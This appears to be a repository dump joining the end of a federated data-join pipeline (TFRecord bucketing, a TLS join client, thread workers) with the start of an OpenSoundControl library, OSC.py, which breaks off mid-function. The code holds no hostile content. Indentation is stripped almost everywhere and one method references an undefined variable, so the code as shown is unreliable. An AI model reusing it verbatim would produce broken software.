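# record_cmp orders keys primarily by the sort column (second element of the split key)
# and secondarily by the hash column (first element), e.g. used as
#   sorted(self._sample_store.keys(), key=cmp_to_key(record_cmp))
# so both join peers are assumed to iterate records in the same deterministic order.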
def getKeyBytes(feature):
if feature is None:
raise RuntimeError("Null feature Input")
if feature.bytes_list.value:
return feature.bytes_list.value[0]
elif feature.int64_list.value:
return bytes(str(feature.int64_list.value[0]), 'utf-8')
elif feature.float_list.value:
return bytes(str(feature.float_list.value[0]), 'utf-8')
else:
raise RuntimeError("Feature Type Error!")
def get_value_from_example(example, hash_col_name, sort_col_name):
return getKeyBytes(example.features.feature[hash_col_name]), getKeyBytes(example.features.feature[sort_col_name])
class ClientSortJoinFunc_local(object):
def __init__(
self,
job_name: str,
peer_host: str,
peer_ip: str,
peer_port: int,
bucket_num: int = 64,
cmp_func=record_cmp,
sample_store_cls=DictSampleKvStore,
batch_size: int = 2048,
wait_s: int = 1800,
tls_crt: str = '',
run_mode: RunMode = RunMode.LOCAL,
output_bucket_file='',
bucket_id=0,
hash_col_name='',
sort_col_name=''):
self._job_name = job_name
self._bucket_num = bucket_num
self._state = None
self._delay = 10000
self._cmp_func = cmp_func
self._sample_store_cls = sample_store_cls
self._peer_host = peer_host
self._peer_ip = peer_ip
self._peer_port = peer_port
self._batch_size = batch_size
self._run_mode = run_mode
self._wait_s = wait_s
self._tls_crt = tls_crt
self._output_bucket_file = output_bucket_file
self._bucket_id = bucket_id
self._hash_col_name = hash_col_name
self._sort_col_name = sort_col_name
if self._sample_store_cls is DictSampleKvStore:
self._sample_store = DictSampleKvStore()
else:
raise RuntimeError("sample_store_cls {} is not supported yet".format(self._sample_store_cls))
self.cnt = 0
def data_join_client_bucket_file(self, bucket_dir_path):
tf_reader = RecordReader()
tf_writer = RecordWriter()
for now_path, subfolder, files in os.walk(bucket_dir_path):
for filename in files:
bucket_file_path = os.path.join(now_path, filename)
raw_dataset = tf_reader.read_from_tfrecord(bucket_file_path)
for raw_record in raw_dataset:
example = tf_reader.example
example.ParseFromString(raw_record)
value0, value1 = get_value_from_example(example, self._hash_col_name, self._sort_col_name)
value = (value0, value1, raw_record)
self._sample_store.put(get_sample_store_key(value[0], value[1]), value[2])
self.cnt += 1
log.info("Loaded {} records from bucket dir {}".format(self.cnt, bucket_dir_path))
keys_to_join = sorted(self._sample_store.keys(), key=cmp_to_key(self._cmp_func))
if self._run_mode == RunMode.K8S:
if self._tls_crt is None or len(self._tls_crt) == 0:
raise RuntimeError("tls crt should not be empty in k8s mode client job!")
client_port = self._peer_port
if self._run_mode == RunMode.LOCAL:
client_port = client_port + self._bucket_id
client = create_data_join_client(host=self._peer_host,
ip=self._peer_ip,
port=client_port,
job_name=self._job_name,
bucket_id=self._bucket_id,
run_mode=self._run_mode,
tls_crt=self._tls_crt)
check_sum = CheckSum()
client.wait_ready(timeout=self._wait_s)
log.info(
"Client begin to join, bucket id:{}, all size:{}, unique size:{}".format(self._bucket_id, self.cnt,
len(keys_to_join)))
cur = 0
while cur < len(keys_to_join):
end = min(cur + self._batch_size, len(keys_to_join))
request_ids = keys_to_join[cur:end]
existence = client.sync_join(request_ids)
res_ids = utils.gather_res(request_ids, existence=existence)
check_sum.add_list(res_ids)
cur = end
for i in res_ids:
self._output_bucket_file.write(tf_writer.encode_example(self._sample_store.get(i)))
log.info("client sync join current idx: {}, all: {}".format(cur, len(keys_to_join)))
log.info("End join, checkSum:{}".format(check_sum.get_check_sum()))
res = client.finish_join(check_sum.get_check_sum())
self._sample_store.clear()
if not res:
raise ValueError("Join finish error")
class data_join_pipeline_local_no_tf(object):
def __init__(self,
input_path: str,
output_path: str,
job_name: str,
host: str,
port: int,
ip: str,
bucket_num: int,
run_mode: str,
hash_col_name: str,
sort_col_name: str,
is_server: bool,
sample_store_type: str,
batch_size: int,
file_part_size: int,
tls_crt_path: str,
wait_s: int = 1800,
use_psi: bool = False,
need_sort: bool = False,
conf: dict = {}):
self._input_path = input_path
self._output_path = output_path
self._job_name = job_name
self._bucket_num = bucket_num
self._state = None
self._delay = 10000
self._sample_store_cls = SAMPLE_STORE_TYPE[sample_store_type]
self._peer_host = host
self._peer_ip = ip
self._peer_port = port
self._batch_size = batch_size
self._run_mode = RunMode(run_mode)
self._hash_col_name = hash_col_name
self._sort_col_name = sort_col_name
self._wait_s = wait_s
self._bucket_path = os.path.join(self._output_path, 'tmp_bucket')
self._DefaultKeySelector = DefaultKeySelector(bucket_num=bucket_num)
self._data_to_bucket_threads_num = self._bucket_num
self._data_to_bucket_file_list_sum = []
self._data_to_bucket_file_name = "{}_{}.tfrecords"
self._data_to_bucket_threads_queue = queue.Queue()
self._data_to_bucket_threads_data_buffer = []
self._data_to_bucket_now_threads = []
self._data_to_bucket_batch_size = batch_size
tls_crt = b''
if tls_crt_path is not None:
with open(tls_crt_path, 'rb') as f:
tls_crt = f.read()
log.info("tls path:{} \n tls value:{}".format(tls_crt_path, tls_crt))
self._tls_crt = tls_crt
def read_buffer_data_to_bucket(self, thread_id):
tf_reader = RecordReader()
tf_writer = RecordWriter()
for raw_record in self._data_to_bucket_threads_data_buffer[thread_id]:
example = tf_reader.example
example.ParseFromString(raw_record)
value0, value1 = get_value_from_example(example, self._hash_col_name, self._sort_col_name)
value = (value0, value1, raw_record)
bucket_id = self._DefaultKeySelector.get_key(value)
self._data_to_bucket_file_list_sum[thread_id][bucket_id].write(tf_writer.encode_example(example.SerializeToString()))
self._data_to_bucket_threads_data_buffer[thread_id].clear()
self._data_to_bucket_now_threads[thread_id] = None
self._data_to_bucket_threads_queue.put(thread_id)
def read_tf_record_data_to_bucket(self):
# Multithreading preparation
if not os.path.exists(self._bucket_path):
os.makedirs(self._bucket_path)
for worker in range(self._data_to_bucket_threads_num):
_data_to_bucket_file_list = []
for i in range(self._bucket_num):
bucket_dir_path = os.path.join(self._bucket_path, str(i))
if not os.path.exists(bucket_dir_path):
os.makedirs(bucket_dir_path)
bucket_file_path = os.path.join(bucket_dir_path, self._data_to_bucket_file_name.format(i, worker))
bucket_file = open(bucket_file_path, 'ab')
_data_to_bucket_file_list.append(bucket_file)
self._data_to_bucket_file_list_sum.append(_data_to_bucket_file_list)
self._data_to_bucket_threads_queue.put(worker)
self._data_to_bucket_threads_data_buffer.append([])
self._data_to_bucket_now_threads.append(None)
now_thread = None
tf_reader = RecordReader()
for now_path, subfolder, files in os.walk(self._input_path):
for _file in files:
filename = os.path.join(now_path, _file)
raw_dataset_tmp = tf_reader.read_from_tfrecord(filename)
raw_dataset = []
for raw_record in raw_dataset_tmp:
raw_dataset.append(raw_record)
size_data = len(raw_dataset)
now_whe = 0
while True:
if now_thread is None:
if self._data_to_bucket_threads_queue.empty():
time.sleep(1)
continue
now_thread = self._data_to_bucket_threads_queue.get()
if len(self._data_to_bucket_threads_data_buffer[now_thread]) + size_data - now_whe \
< self._data_to_bucket_batch_size:
self._data_to_bucket_threads_data_buffer[now_thread] += raw_dataset[now_whe:]
break
elif len(self._data_to_bucket_threads_data_buffer[now_thread]) + size_data - now_whe \
< 2 * self._data_to_bucket_batch_size:
self._data_to_bucket_threads_data_buffer[now_thread] += raw_dataset[now_whe:]
thread_worker = threading.Thread(target=self.read_buffer_data_to_bucket, args=(now_thread,))
self._data_to_bucket_now_threads[now_thread] = thread_worker
thread_worker.start()
now_thread = None
break
else:
empty_size = self._data_to_bucket_batch_size - \
len(self._data_to_bucket_threads_data_buffer[now_thread])
self._data_to_bucket_threads_data_buffer[now_thread] += \
raw_dataset[now_whe:now_whe + empty_size]
thread_worker = threading.Thread(target=self.read_buffer_data_to_bucket, args=(now_thread,))
self._data_to_bucket_now_threads[now_thread] = thread_worker
thread_worker.start()
now_whe += empty_size
now_thread = None
for thread_worker in self._data_to_bucket_now_threads:
if thread_worker is not None:
thread_worker.join()
for _data_to_bucket_file_list in self._data_to_bucket_file_list_sum:
for bucket_file in _data_to_bucket_file_list:
bucket_file.close()
def worker_for_data_join_bucket(self, bucket_id):
bucket_dir_path = os.path.join(self._bucket_path, str(bucket_id))
output_bucket_dir_path = os.path.join(self._output_path, str(bucket_id))
if not os.path.exists(output_bucket_dir_path):
os.makedirs(output_bucket_dir_path)
output_bucket_file_path = os.path.join(output_bucket_dir_path, str(bucket_id) + '.tfrecords')
output_bucket_file = open(output_bucket_file_path, 'ab')
tmp_client = ClientSortJoinFunc_local(
job_name=self._job_name,
peer_host=self._peer_host,
peer_ip=self._peer_ip,
peer_port=self._peer_port,
bucket_num=self._bucket_num,
sample_store_cls=self._sample_store_cls,
batch_size=self._batch_size,
run_mode=self._run_mode,
wait_s=self._wait_s,
tls_crt=self._tls_crt,
output_bucket_file=output_bucket_file,
bucket_id=bucket_id,
hash_col_name=self._hash_col_name,
sort_col_name=self._sort_col_name)
tmp_client.data_join_client_bucket_file(bucket_dir_path)
output_bucket_file.close()
def data_join_client_workers(self):
threads_list = []
for i in range(self._bucket_num):
thread_worker = threading.Thread(target=self.worker_for_data_join_bucket, args=(i,))
threads_list.append(thread_worker)
thread_worker.start()
for thread_worker in threads_list:
thread_worker.join()
shutil.rmtree(self._bucket_path)
def run(self):
self.read_tf_record_data_to_bucket()
self.data_join_client_workers()
return "Program execution finished"
|
OSC.py
|
#!/usr/bin/python3
"""
This module contains an OpenSoundControl implementation (in Pure Python), based
(somewhat) on the good old 'SimpleOSC' implementation by Daniel Holth & Clinton
McChesney.
This implementation is intended to still be 'simple' to the user, but much more
complete (with OSCServer & OSCClient classes) and much more powerful (the
OSCMultiClient supports subscriptions & message-filtering, OSCMessage &
OSCBundle are now proper container-types)
===============================================================================
OpenSoundControl
===============================================================================
OpenSoundControl is a network-protocol for sending (small) packets of addressed
data over network sockets. This OSC-implementation supports the classical
UDP/IP protocol for sending and receiving packets but provides as well support
for TCP/IP streaming, in which case the message size is prepended as an int32 (big
endian) before each message/packet.
OSC-packets come in two kinds:
- OSC-messages consist of an 'address'-string (not to be confused with a
(host:port) network-address!), followed by a string of 'typetags'
associated with the message's arguments (ie. 'payload'), and finally the
arguments themselves, encoded in an OSC-specific way. The OSCMessage class
makes it easy to create & manipulate OSC-messages of this kind in a
'pythonesque' way (that is, OSCMessage-objects behave a lot like lists)
- OSC-bundles are a special type of OSC-message containing only
OSC-messages as 'payload'. Recursively. (meaning; an OSC-bundle could
contain other OSC-bundles, containing OSC-bundles etc.)
OSC-bundles start with the special keyword '#bundle' and do not have an
OSC-address (but the OSC-messages a bundle contains will have OSC-addresses!).
Also, an OSC-bundle can have a timetag, essentially telling the receiving
server to 'hold' the bundle until the specified time. The OSCBundle class
allows easy creation & manipulation of OSC-bundles.
For further information see also http://opensoundcontrol.org/spec-1_0
-------------------------------------------------------------------------------
To send OSC-messages, you need an OSCClient, and to receive OSC-messages you
need an OSCServer.
The OSCClient uses an 'AF_INET / SOCK_DGRAM' type socket (see the 'socket'
module) to send binary representations of OSC-messages to a remote host:port
address.
The OSCServer listens on an 'AF_INET / SOCK_DGRAM' type socket bound to a local
port, and handles incoming requests. Either one-after-the-other (OSCServer) or
in a multi-threaded / multi-process fashion (ThreadingOSCServer/
ForkingOSCServer). If the Server has a callback-function (a.k.a. handler)
registered to 'deal with' (i.e. handle) the received message's OSC-address,
that function is called, passing it the (decoded) message.
The different OSCServers implemented here all support the (recursive) un-
bundling of OSC-bundles, and OSC-bundle timetags.
In fact, this implementation supports:
- OSC-messages with 'i' (int32), 'f' (float32), 'd' (double), 's' (string) and
'b' (blob / binary data) types
- OSC-bundles, including timetag-support
- OSC-address patterns including '*', '?', '{,}' and '[]' wildcards.
(please *do* read the OSC-spec! http://opensoundcontrol.org/spec-1_0 it
explains what these things mean.)
In addition, the OSCMultiClient supports:
- Sending a specific OSC-message to multiple remote servers
- Remote server subscription / unsubscription (through OSC-messages, of course)
- Message-address filtering.
-------------------------------------------------------------------------------
SimpleOSC:
Copyright (c) Daniel Holth & Clinton McChesney.
pyOSC:
Copyright (c) 2008-2010, Artem Baguinski <artm@v2.nl> et al., Stock, V2_Lab, Rotterdam, Netherlands.
Streaming support (OSC over TCP):
Copyright (c) 2010 Uli Franke <uli.franke@weiss.ch>, Weiss Engineering, Uster, Switzerland.
-------------------------------------------------------------------------------
Changelog:
-------------------------------------------------------------------------------
v0.3.0 - 27 Dec. 2007
Started out to extend the 'SimpleOSC' implementation (v0.2.3) by Daniel Holth & Clinton McChesney.
Rewrote OSCMessage
Added OSCBundle
v0.3.1 - 3 Jan. 2008
Added OSCClient
Added OSCRequestHandler, loosely based on the original CallbackManager
Added OSCServer
Removed original CallbackManager
Adapted testing-script (the 'if __name__ == "__main__":' block at the end) to use new Server & Client
v0.3.2 - 5 Jan. 2008
Added 'container-type emulation' methods (getitem(), setitem(), __iter__() & friends) to OSCMessage
Added ThreadingOSCServer & ForkingOSCServer
- 6 Jan. 2008
Added OSCMultiClient
Added command-line options to testing-script (try 'python OSC.py --help')
v0.3.3 - 9 Jan. 2008
Added OSC-timetag support to OSCBundle & OSCRequestHandler
Added ThreadingOSCRequestHandler
v0.3.4 - 13 Jan. 2008
Added message-filtering to OSCMultiClient
Added subscription-handler to OSCServer
Added support for numpy/scipy int & float types. (these get converted to 'standard' 32-bit OSC ints / floats!)
Cleaned-up and added more Docstrings
v0.3.5 - 14 aug. 2008
Added OSCServer.reportErr(...) method
v0.3.6 - 19 April 2010
Added Streaming support (OSC over TCP)
Updated documentation
Moved pattern matching stuff into separate class (OSCAddressSpace) to
facilitate implementation of different server and client architectures.
Callbacks feature now a context (object oriented) but dynamic function
inspection keeps the code backward compatible
Moved testing code into separate testbench (testbench.py)
-----------------
Original Comments
-----------------
> Open SoundControl for Python
> Copyright (C) 2002 Daniel Holth, Clinton McChesney
>
> This library is free software; you can redistribute it and/or modify it under
> the terms of the GNU Lesser General Public License as published by the Free
> Software Foundation; either version 2.1 of the License, or (at your option) any
> later version.
>
> This library is distributed in the hope that it will be useful, but WITHOUT ANY
> WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
> PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
> details.
>
> You should have received a copy of the GNU Lesser General Public License along
> with this library; if not, write to the Free Software Foundation, Inc., 59
> Temple Place, Suite 330, Boston, MA 02111-1307 USA
>
> For questions regarding this module contact Daniel Holth <dholth@stetson.edu>
> or visit http://www.stetson.edu/~ProctoLogic/
>
> Changelog:
> 15 Nov. 2001:
> Removed dependency on Python 2.0 features.
> - dwh
> 13 Feb. 2002:
> Added a generic callback handler.
> - dwh
"""
import math, re, socket, select, string, struct, sys, threading, time, types, array, errno, inspect
from socketserver import UDPServer, DatagramRequestHandler, ForkingMixIn, ThreadingMixIn, StreamRequestHandler, TCPServer
from contextlib import closing
global version
version = ("0.3","6", "$Rev: 6382 $"[6:-2])
global FloatTypes
FloatTypes = [float]
global IntTypes
IntTypes = [int]
global NTP_epoch
from calendar import timegm
NTP_epoch = timegm((1900,1,1,0,0,0)) # NTP time started in 1 Jan 1900
del timegm
global NTP_units_per_second
NTP_units_per_second = 0x100000000 # about 232 picoseconds
##
# numpy/scipy support:
##
try:
from numpy import typeDict
for ftype in ['float32', 'float64', 'float128']:
try:
FloatTypes.append(typeDict[ftype])
except KeyError:
pass
for itype in ['int8', 'int16', 'int32', 'int64']:
try:
IntTypes.append(typeDict[itype])
IntTypes.append(typeDict['u' + itype])
except KeyError:
pass
# thanks for those...
del typeDict, ftype, itype
except ImportError:
# print ('Cannot import numpy in OSC.py')
pass
######
#
# OSCMessage classes
#
######
class OSCMessage(object):
""" Builds typetagged OSC messages.
OSCMessage objects are container objects for building OSC-messages.
On the 'front' end, they behave much like list-objects, and on the 'back' end
they generate a binary representation of the message, which can be sent over a network socket.
OSC-messages consist of an 'address'-string (not to be confused with a (host, port) IP-address!),
followed by a string of 'typetags' associated with the message's arguments (ie. 'payload'),
and finally the arguments themselves, encoded in an OSC-specific way.
On the Python end, OSCMessage are lists of arguments, prepended by the message's address.
The message contents can be manipulated much like a list:
>>> msg = OSCMessage("/my/osc/address")
>>> msg.append('something')
>>> msg.insert(0, 'something else')
>>> msg[1] = 'entirely'
>>> msg.extend([1,2,3.])
>>> msg += [4, 5, 6.]
>>> del msg[3:6]
>>> msg.pop(-2)
5
>>> print(msg)
/my/osc/address ['something else', 'entirely', 1, 6.0]
OSCMessages can be concatenated with the + operator. In this case, the resulting OSCMessage
inherits its address from the left-hand operand. The right-hand operand's address is ignored.
To construct an 'OSC-bundle' from multiple OSCMessage, see OSCBundle!
Additional methods exist for retrieving typetags or manipulating items as (typetag, value) tuples.
"""
def __init__(self, address=""):
"""Instantiate a new OSCMessage.
The OSC-address can be specified with the 'address' argument
"""
self.clear(address)
def setAddress(self, address):
"""Set or change the OSC-address
"""
self.address = address
def clear(self, address=""):
"""Clear (or set a new) OSC-address and clear any arguments appended so far
"""
self.address = address
self.clearData()
def clearData(self):
"""Clear any arguments appended so far
"""
self.typetags = ","
self.message = b""
def append(self, argument, typehint=None):
"""Appends data to the message, updating the typetags based on
the argument's type. If the argument is a blob (counted
string) pass in 'b' as typehint.
'argument' may also be a list or tuple, in which case its elements
will get appended one-by-one, all using the provided typehint
"""
if isinstance(argument,dict):
argument = list(argument.items())
elif isinstance(argument, OSCMessage):
raise TypeError("Can only append 'OSCMessage' to 'OSCBundle'")
if hasattr(argument, '__iter__') and not type(argument) in (str,bytes):
for arg in argument:
self.append(arg, typehint)
return
if typehint == 'b':
binary = OSCBlob(argument)
tag = 'b'
elif typehint == 't':
binary = OSCTimeTag(argument)
tag = 't'
else:
tag, binary = OSCArgument(argument, typehint)
self.typetags += tag
self.message += binary
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString(self.address)
binary += OSCString(self.typetags)
binary += self.message
return binary
def __repr__(self):
"""Returns a string containing the decode Message
"""
return str(decodeOSC(self.getBinary()))
def __str__(self):
"""Returns the Message's address and contents as a string.
"""
return "%s %s" % (self.address, str(list(self.values())))
def __len__(self):
"""Returns the number of arguments appended so far
"""
return (len(self.typetags) - 1)
def __eq__(self, other):
"""Return True if two OSCMessages have the same address & content
"""
if not isinstance(other, self.__class__):
return False
return (self.address == other.address) and (self.typetags == other.typetags) and (self.message == other.message)
def __ne__(self, other):
"""Return (not self.__eq__(other))
"""
return not self.__eq__(other)
def __add__(self, values):
"""Returns a copy of self, with the contents of 'values' appended
(see the 'extend()' method, below)
"""
msg = self.copy()
msg.extend(values)
return msg
def __iadd__(self, values):
"""Appends the contents of 'values'
(equivalent to 'extend()', below)
Returns self
"""
self.extend(values)
return self
def __radd__(self, values):
"""Appends the contents of this OSCMessage to 'values'
Returns the extended 'values' (list or tuple)
"""
out = list(values)
out.extend(list(self.values()))
if isinstance(values,tuple):
return tuple(out)
return out
def _reencode(self, items):
"""Erase & rebuild the OSCMessage contents from the given
list of (typehint, value) tuples"""
self.clearData()
for item in items:
self.append(item[1], item[0])
def values(self):
"""Returns a list of the arguments appended so far
"""
return decodeOSC(self.getBinary())[2:]
def tags(self):
"""Returns a list of typetags of the appended arguments
"""
return list(self.typetags.lstrip(','))
def items(self):
"""Returns a list of (typetag, value) tuples for
the arguments appended so far
"""
out = []
values = list(self.values())
typetags = self.tags()
for i in range(len(values)):
out.append((typetags[i], values[i]))
return out
def __contains__(self, val):
"""Test if the given value appears in the OSCMessage's arguments
"""
return (val in list(self.values()))
def __getitem__(self, i):
"""Returns the indicated argument (or slice)
"""
return list(self.values())[i]
def __delitem__(self, i):
"""Removes the indicated argument (or slice)
"""
items = list(self.items())
del items[i]
self._reencode(items)
def _buildItemList(self, values, typehint=None):
if isinstance(values, OSCMessage):
items = list(values.items())
elif isinstance(values,list):
items = []
for val in values:
if isinstance(val,tuple):
items.append(val[:2])
else:
items.append((typehint, val))
elif isinstance(values,tuple):
items = [values[:2]]
else:
items = [(typehint, values)]
return items
def __setitem__(self, i, val):
"""Set indicatated argument (or slice) to a new value.
'val' can be a single int/float/string, or a (typehint, value) tuple.
Or, if 'i' is a slice, a list of these or another OSCMessage.
"""
items = list(self.items())
new_items = self._buildItemList(val)
if not isinstance(i,slice):
if len(new_items) != 1:
raise TypeError("single-item assignment expects a single value or a (typetag, value) tuple")
new_items = new_items[0]
# finally...
items[i] = new_items
self._reencode(items)
def setItem(self, i, val, typehint=None):
"""Set indicated argument to a new value (with typehint)
"""
items = list(self.items())
items[i] = (typehint, val)
self._reencode(items)
def copy(self):
"""Returns a deep copy of this OSCMessage
"""
msg = self.__class__(self.address)
msg.typetags = self.typetags
msg.message = self.message
return msg
def count(self, val):
"""Returns the number of times the given value occurs in the OSCMessage's arguments
"""
return list(self.values()).count(val)
def index(self, val):
"""Returns the index of the first occurence of the given value in the OSCMessage's arguments.
Raises ValueError if val isn't found
"""
return list(self.values()).index(val)
def extend(self, values):
"""Append the contents of 'values' to this OSCMessage.
'values' can be another OSCMessage, or a list/tuple of ints/floats/strings
"""
items = list(self.items()) + self._buildItemList(values)
self._reencode(items)
def insert(self, i, val, typehint = None):
"""Insert given value (with optional typehint) into the OSCMessage
at the given index.
"""
items = list(self.items())
for item in reversed(self._buildItemList(val)):
items.insert(i, item)
self._reencode(items)
def popitem(self, i):
"""Delete the indicated argument from the OSCMessage, and return it
as a (typetag, value) tuple.
"""
items = list(self.items())
item = items.pop(i)
self._reencode(items)
return item
def pop(self, i):
"""Delete the indicated argument from the OSCMessage, and return it.
"""
return self.popitem(i)[1]
def reverse(self):
"""Reverses the arguments of the OSCMessage (in place)
"""
items = list(self.items())
items.reverse()
self._reencode(items)
def remove(self, val):
"""Removes the first argument with the given value from the OSCMessage.
Raises ValueError if val isn't found.
"""
items = list(self.items())
# this is not very efficient...
i = 0
for (t, v) in items:
if (v == val):
break
i += 1
else:
raise ValueError("'%s' not in OSCMessage" % str(m))
# but more efficient than first calling self.values().index(val),
# then calling self.items(), which would in turn call self.values() again...
del items[i]
self._reencode(items)
def __iter__(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(list(self.values()))
def __reversed__(self):
"""Returns a reverse iterator of the OSCMessage's arguments
"""
return reversed(list(self.values()))
def itervalues(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(list(self.values()))
def iteritems(self):
"""Returns an iterator of the OSCMessage's arguments as
(typetag, value) tuples
"""
return iter(list(self.items()))
def itertags(self):
"""Returns an iterator of the OSCMessage's arguments' typetags
"""
return iter(self.tags())
class OSCBundle(OSCMessage):
"""Builds a 'bundle' of OSC messages.
OSCBundle objects are container objects for building OSC-bundles of OSC-messages.
An OSC-bundle is a special kind of OSC-message which contains a list of OSC-messages
(And yes, OSC-bundles may contain other OSC-bundles...)
OSCBundle objects behave much the same as OSCMessage objects, with these exceptions:
- if an item or items to be appended or inserted are not OSCMessage objects,
OSCMessage objects are created to encapsulate the item(s)
- an OSC-bundle does not have an address of its own, only the contained OSC-messages do.
The OSCBundle's 'address' is inherited by any OSCMessage the OSCBundle object creates.
- OSC-bundles have a timetag to tell the receiver when the bundle should be processed.
The default timetag value (0) means 'immediately'
"""
def __init__(self, address="", time=0):
"""Instantiate a new OSCBundle.
The default OSC-address for newly created OSCMessages
can be specified with the 'address' argument
The bundle's timetag can be set with the 'time' argument
"""
super(OSCBundle, self).__init__(address)
self.timetag = time
def __str__(self):
"""Returns the Bundle's contents (and timetag, if nonzero) as a string.
"""
if (self.timetag > 0.):
out = "#bundle (%s) [" % self.getTimeTagStr()
else:
out = "#bundle ["
if self.__len__():
for val in list(self.values()):
out += "%s, " % str(val)
out = out[:-2] # strip trailing space and comma
return out + "]"
def setTimeTag(self, time):
"""Set or change the OSCBundle's TimeTag
In 'Python Time', that's floating seconds since the Epoch
"""
if time >= 0:
self.timetag = time
def getTimeTagStr(self):
"""Return the TimeTag as a human-readable string
"""
fract, secs = math.modf(self.timetag)
out = time.ctime(secs)[11:19]
out += ("%.3f" % fract)[1:]
return out
def append(self, argument, typehint = None):
"""Appends data to the bundle, creating an OSCMessage to encapsulate
the provided argument unless this is already an OSCMessage.
Any newly created OSCMessage inherits the OSCBundle's address at the time of creation.
If 'argument' is an iterable, its elements will be encapsulated by a single OSCMessage.
Finally, 'argument' can be (or contain) a dict, which will be 'converted' to an OSCMessage;
- if 'addr' appears in the dict, its value overrides the OSCBundle's address
- if 'args' appears in the dict, its value(s) become the OSCMessage's arguments
"""
if isinstance(argument, OSCMessage):
binary = OSCBlob(argument.getBinary())
else:
msg = OSCMessage(self.address)
if isinstance(argument,dict):
if 'addr' in argument:
msg.setAddress(argument['addr'])
if 'args' in argument:
msg.append(argument['args'], typehint)
else:
msg.append(argument, typehint)
binary = OSCBlob(msg.getBinary())
self.message += binary
self.typetags += 'b'
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString("#bundle")
binary += OSCTimeTag(self.timetag)
binary += self.message
return binary
def _reencapsulate(self, decoded):
if decoded[0] == "#bundle":
msg = OSCBundle()
msg.setTimeTag(decoded[1])
for submsg in decoded[2:]:
msg.append(self._reencapsulate(submsg))
else:
msg = OSCMessage(decoded[0])
tags = decoded[1].lstrip(',')
for i in range(len(tags)):
msg.append(decoded[2+i], tags[i])
return msg
def values(self):
"""Returns a list of the OSCMessages appended so far
"""
out = []
for decoded in decodeOSC(self.getBinary())[2:]:
out.append(self._reencapsulate(decoded))
return out
def __eq__(self, other):
"""Return True if two OSCBundles have the same timetag & content
"""
if not isinstance(other, self.__class__):
return False
return (self.timetag == other.timetag) and (self.typetags == other.typetags) and (self.message == other.message)
def copy(self):
"""Returns a deep copy of this OSCBundle
"""
copy = super(OSCBundle, self).copy()
copy.timetag = self.timetag
return copy
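# Illustrative sketch (not part of the original module): building an OSCBundle
# out of plain values, a dict, and an existing OSCMessage. The addresses and
# values are arbitrary examples.
def _example_build_bundle():
    bundle = OSCBundle("/synth/default")   # default address for wrapped items
    bundle.append(440.0)                   # wrapped in an OSCMessage at /synth/default
    bundle.append({'addr': "/synth/volume", 'args': 0.8})
    note = OSCMessage("/synth/note")
    note.append(60)
    bundle.append(note)                    # already an OSCMessage; appended as a blob
    return bundle.getBinary()              # binary form, ready for OSCClient.send()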
######
#
# OSCMessage encoding functions
#
######
def OSCString(next):
"""Convert a string into a zero-padded OSC String.
The length of the resulting string is always a multiple of 4 bytes.
The string ends with 1 to 4 zero-bytes ('\x00')
"""
OSCstringLength = math.ceil((len(next)+1) / 4.0) * 4
return struct.pack(">%ds" % (OSCstringLength), str(next).encode('latin1'))
def OSCBlob(next):
"""Convert a string into an OSC Blob.
An OSC-Blob is a binary encoded block of data, prepended by a 'size' (int32).
The size is always a mutiple of 4 bytes.
The blob ends with 0 to 3 zero-bytes ('\x00')
"""
if isinstance(next,str):
next = next.encode('latin1')
if isinstance(next,bytes):
OSCblobLength = math.ceil((len(next)) / 4.0) * 4
binary = struct.pack(">i%ds" % (OSCblobLength), OSCblobLength, next)
else:
binary = b''
return binary
def OSCArgument(next, typehint=None):
""" Convert some Python types to their
OSC binary representations, returning a
(typetag, data) tuple.
"""
if not typehint:
if type(next) in FloatTypes:
binary = struct.pack(">f", float(next))
tag = 'f'
elif type(next) in IntTypes:
binary = struct.pack(">i", int(next))
tag = 'i'
else:
binary = OSCString(next)
tag = 's'
elif typehint == 'd':
try:
binary = struct.pack(">d", float(next))
tag = 'd'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'f':
try:
binary = struct.pack(">f", float(next))
tag = 'f'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'i':
try:
binary = struct.pack(">i", int(next))
tag = 'i'
except ValueError:
binary = OSCString(next)
tag = 's'
else:
binary = OSCString(next)
tag = 's'
return (tag, binary)
def OSCTimeTag(time):
"""Convert a time in floating seconds to its
OSC binary representation
"""
if time > 0:
fract, secs = math.modf(time)
secs = secs - NTP_epoch
binary = struct.pack('>LL', int(secs), int(fract * NTP_units_per_second))
else:
binary = struct.pack('>LL', 0, 1)
return binary
######
#
# OSCMessage decoding functions
#
######
def _readString(data):
"""Reads the next (null-terminated) block of data
"""
length = data.find(b'\0')
nextData = int(math.ceil((length+1) / 4.0) * 4)
return (data[0:length].decode('latin1'), data[nextData:])
def _readBlob(data):
"""Reads the next (numbered) block of data
"""
length = struct.unpack(">i", data[0:4])[0]
nextData = int(math.ceil((length) / 4.0) * 4) + 4
return (data[4:length+4], data[nextData:])
def _readInt(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit integer. """
if(len(data)<4):
print("Error: too few bytes for int", data, len(data))
rest = data
integer = 0
else:
integer = struct.unpack(">i", data[0:4])[0]
rest = data[4:]
return (integer, rest)
def _readLong(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit signed integer.
"""
high, low = struct.unpack(">ll", data[0:8])
big = (int(high) << 32) + low
rest = data[8:]
return (big, rest)
def _readTimeTag(data):
"""Tries to interpret the next 8 bytes of the data
as a TimeTag.
"""
high, low = struct.unpack(">LL", data[0:8])
if (high == 0) and (low <= 1):
time = 0.0
else:
time = int(NTP_epoch + high) + float(low / NTP_units_per_second)
rest = data[8:]
return (time, rest)
def _readFloat(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit float.
"""
if(len(data)<4):
print("Error: too few bytes for float", data, len(data))
rest = data
float = 0
else:
float = struct.unpack(">f", data[0:4])[0]
rest = data[4:]
return (float, rest)
def _readDouble(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit float.
"""
if(len(data)<8):
print("Error: too few bytes for double", data, len(data))
rest = data
float = 0
else:
float = struct.unpack(">d", data[0:8])[0]
rest = data[8:]
return (float, rest)
def decodeOSC(data):
"""Converts a binary OSC message to a Python list.
"""
table = {"i":_readInt, "f":_readFloat, "s":_readString, "b":_readBlob, "d":_readDouble, "t":_readTimeTag}
decoded = []
address, rest = _readString(data)
if address.startswith(","):
